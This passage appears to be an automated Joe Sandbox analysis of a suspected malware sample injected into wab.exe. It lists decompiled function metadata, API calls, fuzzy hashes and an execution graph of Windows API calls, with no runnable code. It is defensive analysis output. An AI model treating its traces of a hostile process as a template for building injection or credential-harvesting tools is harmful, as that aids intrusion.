                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 22795381
                    • _free.LIBCMT ref: 22795394
                    • _free.LIBCMT ref: 227953A5
                    • _free.LIBCMT ref: 227953B6
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 186e8cedf31b8dbf7790a66b5396474148538314b883a5351c8f7e1e9f4a9eaf
                    • Instruction ID: dc93c61430e883a62b1af9113d3901e72c21f5b294954998473e910decd01400
                    • Opcode Fuzzy Hash: 186e8cedf31b8dbf7790a66b5396474148538314b883a5351c8f7e1e9f4a9eaf
                    • Instruction Fuzzy Hash: 05F0DA708AD335DB86129F38E9944087BB3F7267357110E1AFC10AB258DB3A4A429F80
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 22794C1D
                    • _free.LIBCMT ref: 22794CE8
                    • _free.LIBCMT ref: 22794CF2
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Program Files (x86)\windows mail\wab.exe
                    • API String ID: 2506810119-3377118234
                    • Opcode ID: 91574e1056f6405eb543550b7914a4cb229b8a012363032b3e7c97b64af25a4e
                    • Instruction ID: 39b5e38caf8e301dfa3b539df6b94954fdfa90d5df261acad05ff6ce8dad0540
                    • Opcode Fuzzy Hash: 91574e1056f6405eb543550b7914a4cb229b8a012363032b3e7c97b64af25a4e
                    • Instruction Fuzzy Hash: 4431B271A4A358EFDB12CF99E994D9EBBFCEB96314F1041A6E904A7200D7718A41CB60
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22796FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 22798731
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 227987BA
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 227987CC
                    • __freea.LIBCMT ref: 227987D5
                      • Part of subcall function 227956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22795702
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                    • String ID:
                    • API String ID: 2652629310-0
                    • Opcode ID: 9d9592ad62dad962a9b07e1f556221e91a508edf1baf6e202becb332f0aa407b
                    • Instruction ID: 924bf721db62a308174bbe98bfcc1fea7a4f097f0a0c56f5225a508e973f1eb5
                    • Opcode Fuzzy Hash: 9d9592ad62dad962a9b07e1f556221e91a508edf1baf6e202becb332f0aa407b
                    • Instruction Fuzzy Hash: C131CF32A0431AABDF15CFA4EC85EAF7BA5EB54714F410168FD04DB150E73AD951CBA0
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22791D66,00000000,00000000,?,22795C88,22791D66,00000000,00000000,00000000,?,22795E85,00000006,FlsSetValue), ref: 22795D13
                    • GetLastError.KERNEL32(?,22795C88,22791D66,00000000,00000000,00000000,?,22795E85,00000006,FlsSetValue,2279E190,FlsSetValue,00000000,00000364,?,22795BC8), ref: 22795D1F
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22795C88,22791D66,00000000,00000000,00000000,?,22795E85,00000006,FlsSetValue,2279E190,FlsSetValue,00000000), ref: 22795D2D
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: fae0c86af416ba2a612c015e1d676f95d41190a78a4f3ef942d88086c75b6cf6
                    • Instruction ID: 337c20e2d53665ee5f46c5fc59821682ac503d4cdc9295ed9c4281dadcf1d8af
                    • Opcode Fuzzy Hash: fae0c86af416ba2a612c015e1d676f95d41190a78a4f3ef942d88086c75b6cf6
                    • Instruction Fuzzy Hash: 5601843665D332ABC7115E6EAC8DE467758AF057A5F500A20FE09E7144D734E902CAE0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: : $Se.
                    • API String ID: 4218353326-4089948878
                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                    • Instruction ID: 3178a52bd823c2fcd077c21f6365187cbf33fe98141163fe9704982c3936c54a
                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                    • Instruction Fuzzy Hash: B311E3B1A0434AAECB11CFA8E840BDEFBFCAF19304F10405AE545E7222E6705B02C7A5
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 22792903
                      • Part of subcall function 227935D2: RaiseException.KERNEL32(?,?,?,22792925,00000000,00000000,00000000,?,?,?,?,?,22792925,?,227A21B8), ref: 22793632
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 22792920
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: Unknown exception
                    • API String ID: 3476068407-410509341
                    • Opcode ID: 337854b493160ade5a834921cf6fb6db7e8ecf7e56a7af3bfdfc7c738af63f7b
                    • Instruction ID: 8d5b4ec656c03dc3e7bfd6263d5ba7f48b9e5eb12f54f7a40381ca414cd70476
                    • Opcode Fuzzy Hash: 337854b493160ade5a834921cf6fb6db7e8ecf7e56a7af3bfdfc7c738af63f7b
                    • Instruction Fuzzy Hash: 3FF0AF34A0C30D778B05B6A4FC59D9A776C9B34760B904270EA24A7090FBB1EA16C681
                    APIs
                    • GetOEMCP.KERNEL32(00000000,?,?,22796C7C,?), ref: 22796A1E
                    • GetACP.KERNEL32(00000000,?,?,22796C7C,?), ref: 22796A35
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: |ly"
                    • API String ID: 0-1794994471
                    • Opcode ID: 1c36178b651dbee4b4955c8daba2a554621431615f1b9937180cbfca2661f453
                    • Instruction ID: f05086698086d8961b68e4c1c7a43370024845c1648678f1a8dba5b2143ff6b2
                    • Opcode Fuzzy Hash: 1c36178b651dbee4b4955c8daba2a554621431615f1b9937180cbfca2661f453
                    • Instruction Fuzzy Hash: 4CF049308583898FD700DF68D548B6CB7B1FB0133AF548B48F8389A1D9DB759986CB45

                    Execution Graph

                    Execution Coverage: 6.1%
                    Dynamic/Decrypted Code Coverage: 9.2%
                    Signature Coverage: 2.4%
                    Total number of Nodes: 2000
                    Total number of Limit Nodes: 60
                    execution_graph 40511 441819 40514 430737 40511->40514 40513 441825 40515 430756 40514->40515 40516 43076d 40514->40516 40517 430774 40515->40517 40518 43075f 40515->40518 40516->40513 40529 43034a memcpy 40517->40529 40528 4169a7 11 API calls 40518->40528 40521 4307ce 40522 430819 memset 40521->40522 40530 415b2c 11 API calls 40521->40530 40522->40516 40523 43077e 40523->40516 40523->40521 40526 4307fa 40523->40526 40525 4307e9 40525->40516 40525->40522 40531 4169a7 11 API calls 40526->40531 40528->40516 40529->40523 40530->40525 40531->40516 37539 442ec6 19 API calls 37713 4152c6 malloc 37714 4152e2 37713->37714 37715 4152ef 37713->37715 37717 416760 11 API calls 37715->37717 37717->37714 38294 4466f4 38313 446904 38294->38313 38296 446700 GetModuleHandleA 38299 446710 __set_app_type __p__fmode __p__commode 38296->38299 38298 4467a4 38300 4467ac __setusermatherr 38298->38300 38301 4467b8 38298->38301 38299->38298 38300->38301 38314 4468f0 _controlfp 38301->38314 38303 4467bd _initterm __wgetmainargs _initterm 38304 44681e GetStartupInfoW 38303->38304 38305 446810 38303->38305 38307 446866 GetModuleHandleA 38304->38307 38315 41276d 38307->38315 38311 446896 exit 38312 44689d _cexit 38311->38312 38312->38305 38313->38296 38314->38303 38316 41277d 38315->38316 38358 4044a4 LoadLibraryW 38316->38358 38318 412785 38319 412789 38318->38319 38366 414b81 38318->38366 38319->38311 38319->38312 38322 4127c8 38372 412465 memset ??2@YAPAXI 38322->38372 38324 4127ea 38384 40ac21 38324->38384 38329 412813 38402 40dd07 memset 38329->38402 38330 412827 38407 40db69 memset 38330->38407 38333 412822 38428 4125b6 ??3@YAXPAX 38333->38428 38335 40ada2 _wcsicmp 38336 41283d 38335->38336 38336->38333 38340 412863 CoInitialize 38336->38340 38412 41268e 38336->38412 38432 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38340->38432 38341 41296f 38434 40b633 38341->38434 38346 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW 
GetMessageW 38350 412957 38346->38350 38355 4128ca 38346->38355 38350->38333 38351 4128d0 TranslateAcceleratorW 38352 412941 GetMessageW 38351->38352 38351->38355 38352->38350 38352->38351 38353 412909 IsDialogMessageW 38353->38352 38353->38355 38354 4128fd IsDialogMessageW 38354->38352 38354->38353 38355->38351 38355->38353 38355->38354 38356 41292b TranslateMessage DispatchMessageW 38355->38356 38357 41291f IsDialogMessageW 38355->38357 38356->38352 38357->38352 38357->38356 38359 4044f7 38358->38359 38360 4044cf GetProcAddress 38358->38360 38364 404507 MessageBoxW 38359->38364 38365 40451e 38359->38365 38361 4044e8 FreeLibrary 38360->38361 38362 4044df 38360->38362 38361->38359 38363 4044f3 38361->38363 38362->38361 38363->38359 38364->38318 38365->38318 38367 414b8a 38366->38367 38368 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38366->38368 38438 40a804 memset 38367->38438 38368->38322 38371 414b9e GetProcAddress 38371->38368 38373 4124e0 38372->38373 38374 412505 ??2@YAPAXI 38373->38374 38375 41251c 38374->38375 38377 412521 38374->38377 38460 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38375->38460 38449 444722 38377->38449 38383 41259b wcscpy 38383->38324 38465 40b1ab ??3@YAXPAX ??3@YAXPAX 38384->38465 38386 40ac5c 38389 40ad4b 38386->38389 38390 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38386->38390 38392 40ace7 ??3@YAXPAX 38386->38392 38397 40ad76 38386->38397 38469 40a8d0 7 API calls 38386->38469 38470 4099f4 38386->38470 38389->38397 38478 40a9ce 38389->38478 38390->38386 38392->38386 38466 40aa04 38397->38466 38398 40ada2 38399 40adc9 38398->38399 38401 40adaa 38398->38401 38399->38329 38399->38330 38400 40adb3 _wcsicmp 38400->38399 38400->38401 38401->38399 38401->38400 38484 40dce0 38402->38484 38404 40dd3a GetModuleHandleW 38489 40dba7 38404->38489 38408 40dce0 3 API calls 38407->38408 38409 40db99 38408->38409 38561 40dae1 38409->38561 38575 402f3a 38412->38575 38414 412766 38414->38333 38414->38340 38415 4126d3 _wcsicmp 
38416 4126a8 38415->38416 38416->38414 38416->38415 38418 41270a 38416->38418 38609 4125f8 7 API calls 38416->38609 38418->38414 38578 411ac5 38418->38578 38429 4125da 38428->38429 38430 4125f0 38429->38430 38431 4125e6 DeleteObject 38429->38431 38433 40b1ab ??3@YAXPAX ??3@YAXPAX 38430->38433 38431->38430 38432->38346 38433->38341 38435 40b640 38434->38435 38436 40b639 ??3@YAXPAX 38434->38436 38437 40b1ab ??3@YAXPAX ??3@YAXPAX 38435->38437 38436->38435 38437->38319 38439 40a83b GetSystemDirectoryW 38438->38439 38440 40a84c wcscpy 38438->38440 38439->38440 38445 409719 wcslen 38440->38445 38443 40a881 LoadLibraryW 38444 40a886 38443->38444 38444->38368 38444->38371 38446 409724 38445->38446 38447 409739 wcscat LoadLibraryW 38445->38447 38446->38447 38448 40972c wcscat 38446->38448 38447->38443 38447->38444 38448->38447 38450 444732 38449->38450 38451 444728 DeleteObject 38449->38451 38461 409cc3 38450->38461 38451->38450 38453 412551 38454 4010f9 38453->38454 38455 401130 38454->38455 38456 401134 GetModuleHandleW LoadIconW 38455->38456 38457 401107 wcsncat 38455->38457 38458 40a7be 38456->38458 38457->38455 38459 40a7d2 38458->38459 38459->38383 38459->38459 38460->38377 38464 409bfd memset wcscpy 38461->38464 38463 409cdb CreateFontIndirectW 38463->38453 38464->38463 38465->38386 38467 40aa14 38466->38467 38468 40aa0a ??3@YAXPAX 38466->38468 38467->38398 38468->38467 38469->38386 38471 409a41 38470->38471 38472 4099fb malloc 38470->38472 38471->38386 38474 409a37 38472->38474 38475 409a1c 38472->38475 38474->38386 38476 409a30 ??3@YAXPAX 38475->38476 38477 409a20 memcpy 38475->38477 38476->38474 38477->38476 38479 40a9e7 38478->38479 38480 40a9dc ??3@YAXPAX 38478->38480 38482 4099f4 3 API calls 38479->38482 38481 40a9f2 38480->38481 38483 40a8d0 7 API calls 38481->38483 38482->38481 38483->38397 38508 409bca GetModuleFileNameW 38484->38508 38486 40dce6 wcsrchr 38487 40dcf5 38486->38487 38488 40dcf9 wcscat 38486->38488 38487->38488 38488->38404 38509 44db70 
38489->38509 38493 40dbfd 38512 4447d9 38493->38512 38496 40dc34 wcscpy wcscpy 38538 40d6f5 38496->38538 38497 40dc1f wcscpy 38497->38496 38500 40d6f5 3 API calls 38501 40dc73 38500->38501 38502 40d6f5 3 API calls 38501->38502 38503 40dc89 38502->38503 38504 40d6f5 3 API calls 38503->38504 38505 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38504->38505 38544 40da80 38505->38544 38508->38486 38510 40dbb4 memset memset 38509->38510 38511 409bca GetModuleFileNameW 38510->38511 38511->38493 38514 4447f4 38512->38514 38513 40dc1b 38513->38496 38513->38497 38514->38513 38515 444807 ??2@YAPAXI 38514->38515 38516 44481f 38515->38516 38517 444873 _snwprintf 38516->38517 38518 4448ab wcscpy 38516->38518 38551 44474a 8 API calls 38517->38551 38519 4448bb 38518->38519 38552 44474a 8 API calls 38519->38552 38522 4448a7 38522->38518 38522->38519 38523 4448cd 38553 44474a 8 API calls 38523->38553 38525 4448e2 38554 44474a 8 API calls 38525->38554 38527 4448f7 38555 44474a 8 API calls 38527->38555 38529 44490c 38556 44474a 8 API calls 38529->38556 38531 444921 38557 44474a 8 API calls 38531->38557 38533 444936 38558 44474a 8 API calls 38533->38558 38535 44494b 38559 44474a 8 API calls 38535->38559 38537 444960 ??3@YAXPAX 38537->38513 38539 44db70 38538->38539 38540 40d702 memset GetPrivateProfileStringW 38539->38540 38541 40d752 38540->38541 38542 40d75c WritePrivateProfileStringW 38540->38542 38541->38542 38543 40d758 38541->38543 38542->38543 38543->38500 38545 44db70 38544->38545 38546 40da8d memset 38545->38546 38547 40daac LoadStringW 38546->38547 38548 40dac6 38547->38548 38548->38547 38550 40dade 38548->38550 38560 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38548->38560 38550->38333 38551->38522 38552->38523 38553->38525 38554->38527 38555->38529 38556->38531 38557->38533 38558->38535 38559->38537 38560->38548 38571 409b98 GetFileAttributesW 38561->38571 38563 40daea 38564 40db63 38563->38564 38565 40daef wcscpy wcscpy 
GetPrivateProfileIntW 38563->38565 38564->38335 38572 40d65d GetPrivateProfileStringW 38565->38572 38567 40db3e 38573 40d65d GetPrivateProfileStringW 38567->38573 38569 40db4f 38574 40d65d GetPrivateProfileStringW 38569->38574 38571->38563 38572->38567 38573->38569 38574->38564 38610 40eaff 38575->38610 38579 411ae2 memset 38578->38579 38580 411b8f 38578->38580 38650 409bca GetModuleFileNameW 38579->38650 38592 411a8b 38580->38592 38582 411b0a wcsrchr 38583 411b22 wcscat 38582->38583 38584 411b1f 38582->38584 38651 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38583->38651 38584->38583 38586 411b67 38652 402afb 38586->38652 38590 411b7f 38708 40ea13 SendMessageW memset SendMessageW 38590->38708 38593 402afb 27 API calls 38592->38593 38594 411ac0 38593->38594 38595 4110dc 38594->38595 38596 41113e 38595->38596 38601 4110f0 38595->38601 38733 40969c LoadCursorW SetCursor 38596->38733 38598 411143 38734 444a54 38598->38734 38737 4032b4 38598->38737 38599 4110f7 _wcsicmp 38599->38601 38600 411157 38602 40ada2 _wcsicmp 38600->38602 38601->38596 38601->38599 38755 410c46 10 API calls 38601->38755 38605 411167 38602->38605 38603 4111af 38605->38603 38606 4111a6 qsort 38605->38606 38606->38603 38609->38416 38611 40eb10 38610->38611 38623 40e8e0 38611->38623 38614 40eb6c memcpy memcpy 38618 40ebb7 38614->38618 38615 40ebf2 ??2@YAPAXI ??2@YAPAXI 38617 40ec2e ??2@YAPAXI 38615->38617 38620 40ec65 38615->38620 38616 40d134 16 API calls 38616->38618 38617->38620 38618->38614 38618->38615 38618->38616 38620->38620 38633 40ea7f 38620->38633 38622 402f49 38622->38416 38624 40e8f2 38623->38624 38625 40e8eb ??3@YAXPAX 38623->38625 38626 40e900 38624->38626 38627 40e8f9 ??3@YAXPAX 38624->38627 38625->38624 38628 40e911 38626->38628 38629 40e90a ??3@YAXPAX 38626->38629 38627->38626 38630 40e931 ??2@YAPAXI ??2@YAPAXI 38628->38630 38631 40e921 ??3@YAXPAX 38628->38631 38632 40e92a ??3@YAXPAX 38628->38632 38629->38628 38630->38614 38631->38632 38632->38630 38634 40aa04 ??3@YAXPAX 
38633->38634 38635 40ea88 38634->38635 38636 40aa04 ??3@YAXPAX 38635->38636 38637 40ea90 38636->38637 38638 40aa04 ??3@YAXPAX 38637->38638 38639 40ea98 38638->38639 38640 40aa04 ??3@YAXPAX 38639->38640 38641 40eaa0 38640->38641 38642 40a9ce 4 API calls 38641->38642 38643 40eab3 38642->38643 38644 40a9ce 4 API calls 38643->38644 38645 40eabd 38644->38645 38646 40a9ce 4 API calls 38645->38646 38647 40eac7 38646->38647 38648 40a9ce 4 API calls 38647->38648 38649 40ead1 38648->38649 38649->38622 38650->38582 38651->38586 38709 40b2cc 38652->38709 38654 402b0a 38655 40b2cc 27 API calls 38654->38655 38656 402b23 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 402b3a 38657->38658 38659 40b2cc 27 API calls 38658->38659 38660 402b54 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 402b6b 38661->38662 38663 40b2cc 27 API calls 38662->38663 38664 402b82 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 402b99 38665->38666 38667 40b2cc 27 API calls 38666->38667 38668 402bb0 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 402bc7 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402bde 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402bf5 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402c0c 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402c23 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402c3a 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402c51 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402c68 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402c7f 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402c99 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402cb3 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402cd5 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402cf0 38693->38694 38695 40b2cc 27 API calls 38694->38695 38696 402d0b 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402d26 38697->38698 38699 
40b2cc 27 API calls 38698->38699 38700 402d3e 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402d59 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402d78 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402d93 38705->38706 38707 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38706->38707 38707->38590 38708->38580 38712 40b58d 38709->38712 38711 40b2d1 38711->38654 38713 40b5a4 GetModuleHandleW FindResourceW 38712->38713 38714 40b62e 38712->38714 38715 40b5c2 LoadResource 38713->38715 38717 40b5e7 38713->38717 38714->38711 38716 40b5d0 SizeofResource LockResource 38715->38716 38715->38717 38716->38717 38717->38714 38725 40afcf 38717->38725 38719 40b608 memcpy 38728 40b4d3 memcpy 38719->38728 38721 40b61e 38729 40b3c1 18 API calls 38721->38729 38723 40b626 38730 40b04b 38723->38730 38726 40b04b ??3@YAXPAX 38725->38726 38727 40afd7 ??2@YAPAXI 38726->38727 38727->38719 38728->38721 38729->38723 38731 40b051 ??3@YAXPAX 38730->38731 38732 40b05f 38730->38732 38731->38732 38732->38714 38733->38598 38735 444a64 FreeLibrary 38734->38735 38736 444a83 38734->38736 38735->38736 38736->38600 38738 4032c4 38737->38738 38739 40b633 ??3@YAXPAX 38738->38739 38740 403316 38739->38740 38756 44553b 38740->38756 38744 403480 38952 40368c 15 API calls 38744->38952 38746 403489 38747 40b633 ??3@YAXPAX 38746->38747 38748 403495 38747->38748 38748->38600 38749 4033a9 memset memcpy 38750 4033ec wcscmp 38749->38750 38751 40333c 38749->38751 38750->38751 38751->38744 38751->38749 38751->38750 38950 4028e7 11 API calls 38751->38950 38951 40f508 6 API calls 38751->38951 38753 403421 _wcsicmp 38753->38751 38755->38601 38757 445548 38756->38757 38758 445599 38757->38758 38953 40c768 38757->38953 38759 4455a8 memset 38758->38759 38900 4457f2 38758->38900 39036 403988 38759->39036 38766 445854 38767 4458aa 38766->38767 39161 403c9c memset memset memset memset memset 38766->39161 38769 44594a 38767->38769 38770 4458bb memset 
memset 38767->38770 38768 445672 39047 403fbe memset memset memset memset memset 38768->39047 38772 4459ed 38769->38772 38773 44595e memset memset 38769->38773 38775 414c2e 16 API calls 38770->38775 38777 445a00 memset memset 38772->38777 38778 445b22 38772->38778 38779 414c2e 16 API calls 38773->38779 38774 4455e5 38774->38768 38791 44560f 38774->38791 38780 4458f9 38775->38780 39184 414c2e 38777->39184 38783 445bca 38778->38783 38784 445b38 memset memset memset 38778->38784 38789 44599c 38779->38789 38790 40b2cc 27 API calls 38780->38790 38800 445c8b memset memset 38783->38800 38850 445cf0 38783->38850 38795 445bd4 38784->38795 38796 445b98 38784->38796 38785 445849 39248 40b1ab ??3@YAXPAX ??3@YAXPAX 38785->39248 38799 40b2cc 27 API calls 38789->38799 38801 445909 38790->38801 38792 4087b3 338 API calls 38791->38792 38811 445621 38792->38811 38794 44589f 39249 40b1ab ??3@YAXPAX ??3@YAXPAX 38794->39249 38808 414c2e 16 API calls 38795->38808 38796->38795 38804 445ba2 38796->38804 38813 4459ac 38799->38813 38802 414c2e 16 API calls 38800->38802 38810 409d1f 6 API calls 38801->38810 38814 445cc9 38802->38814 39321 4099c6 wcslen 38804->39321 38805 4456b2 39236 40b1ab ??3@YAXPAX ??3@YAXPAX 38805->39236 38807 40b2cc 27 API calls 38817 445a4f 38807->38817 38819 445be2 38808->38819 38809 403335 38949 4452e5 45 API calls 38809->38949 38822 445919 38810->38822 39234 4454bf 20 API calls 38811->39234 38812 445823 38812->38785 38830 4087b3 338 API calls 38812->38830 38823 409d1f 6 API calls 38813->38823 38824 409d1f 6 API calls 38814->38824 38815 445879 38815->38794 38834 4087b3 338 API calls 38815->38834 39199 409d1f wcslen wcslen 38817->39199 38828 40b2cc 27 API calls 38819->38828 38820 445d3d 38848 40b2cc 27 API calls 38820->38848 38821 445d88 memset memset memset 38831 414c2e 16 API calls 38821->38831 39250 409b98 GetFileAttributesW 38822->39250 38832 4459bc 38823->38832 38833 445ce1 38824->38833 38825 445bb3 39324 445403 memset 38825->39324 38826 445680 38826->38805 39070 
4087b3 memset 38826->39070 38837 445bf3 38828->38837 38830->38812 38840 445dde 38831->38840 39317 409b98 GetFileAttributesW 38832->39317 39341 409b98 GetFileAttributesW 38833->39341 38834->38815 38847 409d1f 6 API calls 38837->38847 38838 445928 38838->38769 39251 40b6ef 38838->39251 38849 40b2cc 27 API calls 38840->38849 38842 4459cb 38842->38772 38859 40b6ef 252 API calls 38842->38859 38846 40b2cc 27 API calls 38852 445a94 38846->38852 38854 445c07 38847->38854 38855 445d54 _wcsicmp 38848->38855 38858 445def 38849->38858 38850->38809 38850->38820 38850->38821 38851 445389 258 API calls 38851->38783 39204 40ae18 38852->39204 38853 44566d 38853->38900 39121 413d4c 38853->39121 38862 445389 258 API calls 38854->38862 38863 445d71 38855->38863 38926 445d67 38855->38926 38857 445665 39235 40b1ab ??3@YAXPAX ??3@YAXPAX 38857->39235 38864 409d1f 6 API calls 38858->38864 38859->38772 38867 445c17 38862->38867 39342 445093 23 API calls 38863->39342 38870 445e03 38864->38870 38866 4456d8 38872 40b2cc 27 API calls 38866->38872 38873 40b2cc 27 API calls 38867->38873 38869 44563c 38869->38857 38875 4087b3 338 API calls 38869->38875 39343 409b98 GetFileAttributesW 38870->39343 38871 40b6ef 252 API calls 38871->38809 38877 4456e2 38872->38877 38878 445c23 38873->38878 38874 445d83 38874->38809 38875->38869 39237 413fa6 _wcsicmp _wcsicmp 38877->39237 38882 409d1f 6 API calls 38878->38882 38880 445e12 38883 445e6b 38880->38883 38887 40b2cc 27 API calls 38880->38887 38885 445c37 38882->38885 39345 445093 23 API calls 38883->39345 38884 4456eb 38890 4456fd memset memset memset memset 38884->38890 38891 4457ea 38884->38891 38892 445389 258 API calls 38885->38892 38886 445b17 39318 40aebe 38886->39318 38894 445e33 38887->38894 39238 409c70 wcscpy wcsrchr 38890->39238 39241 413d29 38891->39241 38898 445c47 38892->38898 38899 409d1f 6 API calls 38894->38899 38896 445e7e 38901 445f67 38896->38901 38904 40b2cc 27 API calls 38898->38904 38905 445e47 38899->38905 38900->38766 39138 403e2d 
memset memset memset memset memset 38900->39138 38906 40b2cc 27 API calls 38901->38906 38902 445ab2 memset 38907 40b2cc 27 API calls 38902->38907 38909 445c53 38904->38909 39344 409b98 GetFileAttributesW 38905->39344 38911 445f73 38906->38911 38912 445aa1 38907->38912 38908 409c70 2 API calls 38913 44577e 38908->38913 38914 409d1f 6 API calls 38909->38914 38916 409d1f 6 API calls 38911->38916 38912->38886 38912->38902 38917 409d1f 6 API calls 38912->38917 39211 40add4 38912->39211 39216 445389 38912->39216 39225 40ae51 38912->39225 38918 409c70 2 API calls 38913->38918 38919 445c67 38914->38919 38915 445e56 38915->38883 38923 445e83 memset 38915->38923 38920 445f87 38916->38920 38917->38912 38921 44578d 38918->38921 38922 445389 258 API calls 38919->38922 39348 409b98 GetFileAttributesW 38920->39348 38921->38891 38928 40b2cc 27 API calls 38921->38928 38922->38783 38927 40b2cc 27 API calls 38923->38927 38926->38809 38926->38871 38929 445eab 38927->38929 38930 4457a8 38928->38930 38931 409d1f 6 API calls 38929->38931 38932 409d1f 6 API calls 38930->38932 38934 445ebf 38931->38934 38933 4457b8 38932->38933 39240 409b98 GetFileAttributesW 38933->39240 38936 